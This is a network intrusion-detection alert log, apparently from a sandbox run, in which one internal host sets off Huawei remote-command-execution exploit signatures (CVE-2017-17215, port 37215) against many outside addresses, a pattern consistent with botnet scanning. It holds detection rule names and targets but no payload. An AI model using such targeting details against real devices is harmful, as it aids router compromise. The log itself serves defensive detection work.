                                                        06/13/24-21:32:58.824041TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5120237215192.168.2.14156.229.166.239
                                                        06/13/24-21:32:25.993663TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4394837215192.168.2.1441.138.139.9
                                                        06/13/24-21:33:11.160662TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5257437215192.168.2.14197.103.21.242
                                                        06/13/24-21:32:38.318192TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4403037215192.168.2.14197.196.8.139
                                                        06/13/24-21:32:19.729772TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5091437215192.168.2.1441.4.150.40
                                                        06/13/24-21:32:56.754397TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4457437215192.168.2.14197.116.229.195
                                                        06/13/24-21:32:19.751226TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3806837215192.168.2.1441.249.230.43
                                                        06/13/24-21:32:38.297731TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5551837215192.168.2.14156.137.223.210
                                                        06/13/24-21:32:44.452689TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5042037215192.168.2.14156.110.149.183
                                                        06/13/24-21:32:01.241520TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4596237215192.168.2.14197.54.64.37
                                                        06/13/24-21:32:58.822382TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3439237215192.168.2.1441.93.203.3
                                                        06/13/24-21:32:13.567068TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4179637215192.168.2.1441.146.2.231
                                                        06/13/24-21:32:11.487968TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6030437215192.168.2.14197.234.8.131
                                                        06/13/24-21:32:36.263719TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3287037215192.168.2.1441.101.56.49
                                                        06/13/24-21:32:25.974860TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4287037215192.168.2.14156.254.94.57
                                                        06/13/24-21:32:03.301037TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5314637215192.168.2.14197.38.131.214
                                                        06/13/24-21:32:56.755988TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5674637215192.168.2.1441.218.25.216
                                                        06/13/24-21:32:58.842063TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3810637215192.168.2.14197.189.142.198
                                                        06/13/24-21:33:11.180721TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5460837215192.168.2.14156.233.84.254
                                                        06/13/24-21:32:05.371345TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4978037215192.168.2.1441.97.114.105
                                                        06/13/24-21:33:17.307561TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5517237215192.168.2.14197.104.108.205
                                                        06/13/24-21:32:17.697683TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5109037215192.168.2.1441.224.128.62
                                                        06/13/24-21:32:25.994432TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3362637215192.168.2.14197.11.44.246
                                                        06/13/24-21:32:44.453647TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4713837215192.168.2.14156.188.121.57
                                                        06/13/24-21:32:52.660199TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3912237215192.168.2.14156.47.33.249
                                                        06/13/24-21:32:38.317192TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4378437215192.168.2.1441.176.138.68
                                                        06/13/24-21:32:03.276438TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5434637215192.168.2.14197.185.19.212
                                                        06/13/24-21:32:15.633738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3481837215192.168.2.14156.167.46.178
                                                        06/13/24-21:32:36.243713TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4162037215192.168.2.14156.119.10.5
                                                        06/13/24-21:32:11.487423TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3687837215192.168.2.14156.188.102.119
                                                        06/13/24-21:32:13.543800TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4888837215192.168.2.14197.69.234.186
                                                        06/13/24-21:32:36.244178TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4068237215192.168.2.14156.186.210.147
                                                        06/13/24-21:32:25.971846TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5983837215192.168.2.14197.46.86.164
                                                        06/13/24-21:32:23.833349TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4837637215192.168.2.1441.21.203.61
                                                        06/13/24-21:32:48.572155TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5910237215192.168.2.14197.158.161.15
                                                        06/13/24-21:32:17.672652TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4793237215192.168.2.14156.113.159.81
                                                        06/13/24-21:32:30.125074TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4800437215192.168.2.14197.171.223.69
                                                        06/13/24-21:32:34.214950TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3817037215192.168.2.14156.170.138.181
                                                        06/13/24-21:31:57.153228TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5128637215192.168.2.14156.235.26.115
                                                        06/13/24-21:32:40.356947TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3594237215192.168.2.14156.203.154.122
                                                        06/13/24-21:33:09.091324TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5892837215192.168.2.14197.45.33.41
                                                        06/13/24-21:32:07.403364TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3586837215192.168.2.14197.31.140.13
                                                        06/13/24-21:32:07.402375TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5406637215192.168.2.14197.227.87.157
                                                        06/13/24-21:33:04.987857TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5015237215192.168.2.1441.119.128.50
                                                        06/13/24-21:32:34.217442TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5121037215192.168.2.14156.162.97.94
                                                        06/13/24-21:32:23.941362TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3403237215192.168.2.14156.170.217.216
                                                        06/13/24-21:32:23.942351TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4442837215192.168.2.1441.9.1.77
                                                        06/13/24-21:32:23.937479TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6042037215192.168.2.1441.133.67.205
                                                        06/13/24-21:32:11.508955TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4050037215192.168.2.14197.199.3.100
                                                        06/13/24-21:32:38.303168TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5775637215192.168.2.14156.99.157.14
                                                        06/13/24-21:32:05.348698TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3658437215192.168.2.1441.77.18.170
                                                        06/13/24-21:32:07.417449TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5252637215192.168.2.14197.189.141.95
                                                        06/13/24-21:32:15.605415TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4693437215192.168.2.14156.24.172.61
                                                        06/13/24-21:32:34.215676TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5618637215192.168.2.14197.90.195.78
                                                        06/13/24-21:33:07.041961TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3910237215192.168.2.14197.50.194.214
                                                        06/13/24-21:32:52.660489TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4664237215192.168.2.14156.174.199.53
                                                        06/13/24-21:32:44.454426TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3746037215192.168.2.14197.69.134.254
                                                        06/13/24-21:32:52.677000TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5188437215192.168.2.14156.125.36.112
                                                        06/13/24-21:31:57.137179TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4677637215192.168.2.14197.154.74.163
                                                        06/13/24-21:32:44.452862TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4680037215192.168.2.14156.145.174.106
                                                        06/13/24-21:32:48.569724TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5241437215192.168.2.14156.35.217.145
                                                        06/13/24-21:32:58.820587TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4261237215192.168.2.14156.92.30.236
                                                        06/13/24-21:33:13.230897TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4088237215192.168.2.1441.128.40.255
                                                        06/13/24-21:32:54.711810TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3529637215192.168.2.14197.114.20.64
                                                        06/13/24-21:32:03.307055TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5713237215192.168.2.1441.216.212.177
                                                        06/13/24-21:32:13.543362TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3387637215192.168.2.1441.219.139.166
                                                        06/13/24-21:32:34.217985TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4899637215192.168.2.1441.238.185.215
                                                        06/13/24-21:32:50.613383TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6077637215192.168.2.14197.237.124.125
                                                        06/13/24-21:32:58.823235TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4179837215192.168.2.14156.162.1.73
                                                        06/13/24-21:33:07.042390TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4965237215192.168.2.1441.122.35.121
                                                        06/13/24-21:32:30.078772TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5041237215192.168.2.14156.156.236.135
                                                        06/13/24-21:32:40.354598TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3783837215192.168.2.14197.91.234.161
                                                        06/13/24-21:32:23.830619TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4117037215192.168.2.14197.34.189.182
                                                        06/13/24-21:32:09.438408TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4106037215192.168.2.14156.54.111.130
                                                        06/13/24-21:32:48.554653TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5145037215192.168.2.14197.253.153.180
                                                        06/13/24-21:33:15.272793TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4895437215192.168.2.14197.156.13.110
                                                        06/13/24-21:32:05.345000TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4314237215192.168.2.1441.135.70.67
                                                        06/13/24-21:32:11.488995TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3443837215192.168.2.1441.100.89.57
                                                        06/13/24-21:33:09.106306TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5150437215192.168.2.14156.163.240.2
                                                        06/13/24-21:32:13.546279TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4905037215192.168.2.14156.187.212.27
                                                        06/13/24-21:32:34.215015TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5283037215192.168.2.14156.212.10.189
                                                        06/13/24-21:33:15.275357TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3455837215192.168.2.1441.204.170.89
                                                        06/13/24-21:32:54.710863TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5821237215192.168.2.1441.100.94.207
                                                        06/13/24-21:33:09.088895TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4784637215192.168.2.14197.237.184.169
                                                        06/13/24-21:32:38.318325TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3435037215192.168.2.1441.153.75.122
                                                        06/13/24-21:32:30.079967TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3694837215192.168.2.14156.13.188.194
                                                        06/13/24-21:32:17.675277TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4561837215192.168.2.14197.139.236.84
                                                        06/13/24-21:32:28.026117TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4138237215192.168.2.1441.207.66.51
                                                        06/13/24-21:33:07.054996TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4859437215192.168.2.14197.213.100.77
                                                        06/13/24-21:33:05.017111TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4631237215192.168.2.1441.145.147.236
                                                        06/13/24-21:32:42.407116TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6083437215192.168.2.1441.168.243.107
                                                        06/13/24-21:32:21.783114TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4183237215192.168.2.1441.253.101.201
                                                        06/13/24-21:33:09.088446TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5883637215192.168.2.14156.22.141.143
                                                        06/13/24-21:32:11.486380TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3331837215192.168.2.14156.41.225.17
                                                        06/13/24-21:32:28.028947TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3721237215192.168.2.14156.70.177.83
                                                        06/13/24-21:32:40.371716TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3308437215192.168.2.14156.34.199.217
                                                        06/13/24-21:32:21.799433TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3991637215192.168.2.14156.229.172.4
                                                        06/13/24-21:32:42.423925TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3968037215192.168.2.14156.3.63.32
                                                        06/13/24-21:31:57.092356TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5438637215192.168.2.1441.239.49.185
                                                        06/13/24-21:32:19.731369TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4920437215192.168.2.14197.235.10.66
                                                        06/13/24-21:32:38.323735TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4277237215192.168.2.1441.185.175.102
                                                        06/13/24-21:32:42.420107TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3410437215192.168.2.1441.162.233.201
                                                        06/13/24-21:33:13.211903TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5110837215192.168.2.14197.108.164.168
                                                        06/13/24-21:32:23.834540TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4132437215192.168.2.14156.242.160.233
                                                        06/13/24-21:32:56.758569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3948237215192.168.2.14156.1.210.141
                                                        06/13/24-21:32:15.633263TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4917437215192.168.2.14156.204.186.206
                                                        06/13/24-21:33:09.089118TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3310837215192.168.2.14156.212.239.239
                                                        06/13/24-21:32:03.277169TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4715837215192.168.2.14197.238.194.238
                                                        06/13/24-21:32:52.654874TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3552037215192.168.2.14156.13.112.1
                                                        06/13/24-21:32:52.677087TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5629037215192.168.2.14197.102.72.201
                                                        06/13/24-21:32:34.217883TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4563637215192.168.2.14197.52.115.239
                                                        06/13/24-21:32:09.456638TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5100637215192.168.2.14156.130.83.217
                                                        06/13/24-21:32:36.248135TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3354437215192.168.2.1441.198.35.243
                                                        06/13/24-21:32:05.376332TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5187637215192.168.2.1441.107.162.238
                                                        06/13/24-21:32:56.755630TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5743237215192.168.2.1441.32.51.119
                                                        06/13/24-21:32:44.475529TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4005837215192.168.2.1441.210.159.220
                                                        06/13/24-21:32:11.507412TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6050237215192.168.2.1441.105.121.146
                                                        06/13/24-21:32:03.306603TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3590037215192.168.2.14156.188.5.185
                                                        06/13/24-21:32:44.476852TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4390837215192.168.2.14156.110.191.95
                                                        06/13/24-21:32:52.654216TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5151837215192.168.2.14197.249.18.71
                                                        06/13/24-21:31:57.133569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5267437215192.168.2.1441.220.170.126
                                                        06/13/24-21:31:59.177708TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4497037215192.168.2.14197.235.39.79
                                                        06/13/24-21:32:19.751528TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4369037215192.168.2.14197.84.47.165
                                                        06/13/24-21:32:36.268590TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5216037215192.168.2.14197.247.223.131
                                                        06/13/24-21:32:15.608025TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3796837215192.168.2.14197.243.54.29
                                                        06/13/24-21:32:52.670892TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4598237215192.168.2.14197.27.132.230
                                                        06/13/24-21:32:19.731833TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4874637215192.168.2.1441.225.182.137
                                                        06/13/24-21:32:58.822738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4768437215192.168.2.14197.201.113.126
                                                        06/13/24-21:33:00.870283TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3933437215192.168.2.14156.74.197.247
                                                        06/13/24-21:32:17.677391TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5446037215192.168.2.14197.186.19.161
                                                        06/13/24-21:32:46.508180TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4092637215192.168.2.14197.115.220.205
                                                        06/13/24-21:32:42.405647TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4498237215192.168.2.14156.105.247.193
                                                        06/13/24-21:32:38.302725TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4785037215192.168.2.14197.198.158.123
                                                        06/13/24-21:32:09.460077TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4077037215192.168.2.14156.142.125.118
                                                        06/13/24-21:32:36.244422TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5406237215192.168.2.14197.112.84.63
                                                        06/13/24-21:32:34.191233TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4882837215192.168.2.14156.165.23.26
                                                        06/13/24-21:32:38.317025TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5944237215192.168.2.1441.101.45.220
                                                        06/13/24-21:33:00.869017TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4055237215192.168.2.1441.245.13.167
                                                        06/13/24-21:31:57.093133TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4761037215192.168.2.14156.13.82.96
                                                        06/13/24-21:32:17.672529TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5349437215192.168.2.14156.146.212.183
                                                        06/13/24-21:32:44.453289TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5429437215192.168.2.14156.176.187.177
                                                        06/13/24-21:32:38.298202TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4724437215192.168.2.14156.51.43.144
                                                        06/13/24-21:32:01.247801TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3432837215192.168.2.14197.218.104.23
                                                        06/13/24-21:32:30.125864TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5766237215192.168.2.14197.4.254.95
                                                        06/13/24-21:31:57.137673TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3345437215192.168.2.14156.44.92.123
                                                        06/13/24-21:32:11.484778TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5155437215192.168.2.1441.67.185.231
                                                        06/13/24-21:33:09.106734TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3924837215192.168.2.14197.198.205.200
                                                        06/13/24-21:32:46.509183TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5319437215192.168.2.14156.84.33.126
                                                        06/13/24-21:32:25.977123TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5258837215192.168.2.1441.70.50.232
                                                        06/13/24-21:33:09.110094TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5084037215192.168.2.14197.22.46.88
                                                        06/13/24-21:33:00.867990TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5915637215192.168.2.14197.216.160.38
                                                        06/13/24-21:33:15.276066TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5280637215192.168.2.14156.97.149.252
                                                        06/13/24-21:32:23.931323TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3616637215192.168.2.14156.85.45.22
                                                        06/13/24-21:33:07.040220TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5800637215192.168.2.14197.154.212.68
                                                        06/13/24-21:33:13.212123TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5768037215192.168.2.14197.220.88.121
                                                        06/13/24-21:33:11.155989TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4194037215192.168.2.14197.93.121.30
                                                        06/13/24-21:32:54.726602TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5156837215192.168.2.14156.86.121.199
                                                        06/13/24-21:31:57.131657TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5727437215192.168.2.14156.251.146.104
                                                        06/13/24-21:32:42.409761TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4038437215192.168.2.14156.254.198.76
                                                        06/13/24-21:32:36.246444TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5045837215192.168.2.1441.118.53.39
                                                        06/13/24-21:32:44.477958TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5720637215192.168.2.1441.51.106.106
                                                        06/13/24-21:32:48.549822TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4659237215192.168.2.14156.247.162.114
                                                        06/13/24-21:32:23.830373TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4831637215192.168.2.14156.89.146.224
                                                        06/13/24-21:32:23.943975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3706037215192.168.2.1441.246.182.151
                                                        06/13/24-21:32:15.634313TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5327637215192.168.2.14156.173.246.15
                                                        06/13/24-21:33:15.272957TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3733837215192.168.2.14197.171.16.21
                                                        06/13/24-21:32:17.695753TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3308037215192.168.2.14197.11.63.223
                                                        06/13/24-21:32:54.708028TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3679437215192.168.2.14156.183.166.63
                                                        06/13/24-21:32:32.154167TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3869237215192.168.2.14197.91.25.253
                                                        06/13/24-21:33:11.160535TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5443437215192.168.2.14197.209.122.49
                                                        06/13/24-21:32:19.729271TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4989037215192.168.2.14156.186.90.121
                                                        06/13/24-21:33:02.949848TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4124237215192.168.2.14156.207.203.151
                                                        06/13/24-21:32:25.996513TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3802037215192.168.2.14197.193.9.248
                                                        06/13/24-21:32:07.420268TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4309237215192.168.2.14197.136.203.186
                                                        06/13/24-21:32:42.404723TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5877237215192.168.2.1441.20.58.249
                                                        06/13/24-21:32:46.501801TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4238037215192.168.2.1441.212.80.83
                                                        06/13/24-21:32:15.611011TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5162637215192.168.2.14197.124.67.218
                                                        06/13/24-21:32:52.654924TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5995837215192.168.2.1441.73.15.35
                                                        06/13/24-21:32:09.457019TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4467637215192.168.2.1441.181.50.196
                                                        06/13/24-21:32:17.672283TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5559637215192.168.2.1441.112.139.203
                                                        06/13/24-21:32:36.264205TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4508237215192.168.2.14156.101.18.25
                                                        06/13/24-21:32:50.630587TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4224637215192.168.2.1441.24.255.112
                                                        06/13/24-21:33:17.341102TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4461437215192.168.2.1441.168.22.26
                                                        06/13/24-21:33:07.056508TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5701837215192.168.2.14156.195.103.189
                                                        06/13/24-21:32:30.093980TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5728637215192.168.2.14197.156.172.117
                                                        06/13/24-21:32:01.224325TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4221237215192.168.2.1441.197.219.42
                                                        06/13/24-21:32:30.099481TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5976637215192.168.2.14156.79.126.63
